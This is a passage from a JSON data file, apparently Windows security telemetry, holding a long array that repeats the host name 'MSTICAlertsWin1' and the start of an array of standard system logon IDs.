in1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EffectiveLogonId\":[\"0x3e7\",\"0x3e4\",\"0x3e4\",\"0x3e7\",\"0x3e7\",\"0x3e5\",\"0x3e4\",\"0x3e7\",\"0x3e5\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"